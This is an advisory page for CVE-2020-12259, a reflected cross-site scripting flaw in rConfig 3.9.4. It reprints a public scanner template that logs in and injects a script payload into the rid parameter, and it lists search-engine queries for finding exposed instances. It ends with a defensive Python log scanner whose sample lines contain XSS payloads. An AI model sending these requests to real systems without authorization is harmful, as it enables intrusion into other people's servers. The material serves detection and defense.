CVE-2020-12259: rConfig 3.9.4 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: rConfig | PoC: public

Vulnerability description

rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php.

PoC code [public]

id: CVE-2020-12259

info:
  name: rConfig 3.9.4 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
  reference:
    - https://www.rconfig.com/downloads/rconfig-3.9.4.zip
    - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12259
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2020-12259
    cwe-id: CWE-79
    epss-score: 0.65806
    epss-percentile: 0.98461
    cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 3
    vendor: rconfig
    product: rconfig
    shodan-query:
      - http.title:"rConfig"
      - http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve2020,cve,rconfig,authenticated,xss

http:
  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pass={{password}}&sublogin=1
      - |
        GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
          - 'contains(content_type_3, "text/html")'
        condition: and
# digest: 4a0a0047304502202070a387486324c7327ec747b2c13d36875bebcfe00cb7aa6aabf8e3fd8ca4bf0221008a6ceeacf758bb5fb08f69b9a29881a3dd7546aed25d8bf45290c4bdf757d10a:922c64590222798bb761d5b6d8e72950
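The template above sends its payload in the rid parameter of configDevice.php, so the same request pattern is what a defender should look for in web server access logs. The following is an added example (not part of the advisory or of rConfig) that scans constructed combined-format log lines for non-numeric or markup-bearing rid values on the two pages the advisory names; it assumes a legitimate rid is a numeric device id.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access log lines (combined log format), not taken from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "GET /configDevice.php?rid=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Aug/2025:10:00:09 +0000] "GET /configDevice.php?rid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Aug/2025:10:00:10 +0000] "POST /lib/crud/userprocess.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Aug/2025:10:00:12 +0000] "GET /devicemgmnt.php?rid=7%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 4000 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Pages the advisory names as reflecting the rid parameter (compared case-insensitively).
WATCHED_PAGES = {"/configdevice.php", "/devicemgmnt.php"}

# Markup fragments that make a reflected-XSS attempt explicit in the decoded value.
MARKERS = ("<script", "<img", "onerror=", "onload=", "javascript:")


def find_rid_xss(log_text):
    """Return (ip, page, decoded rid, reason) tuples for suspicious rid values.

    Assumption: a legitimate rid is a purely numeric device id, so anything else
    is flagged, with a stronger reason when HTML/script markup is present.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path.lower() not in WATCHED_PAGES:
            continue
        for rid in parse_qs(parts.query, keep_blank_values=True).get("rid", []):
            decoded = unquote(rid).lower()  # parse_qs decoded once; catch double encoding
            if decoded.isdigit():
                continue
            reason = "non-numeric rid"
            if any(mk in decoded for mk in MARKERS):
                reason = "html/script markup in rid"
            hits.append((m.group("ip"), parts.path, decoded, reason))
    return hits


if __name__ == "__main__":
    for hit in find_rid_xss(SAMPLE_LOG):
        print(hit)
```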
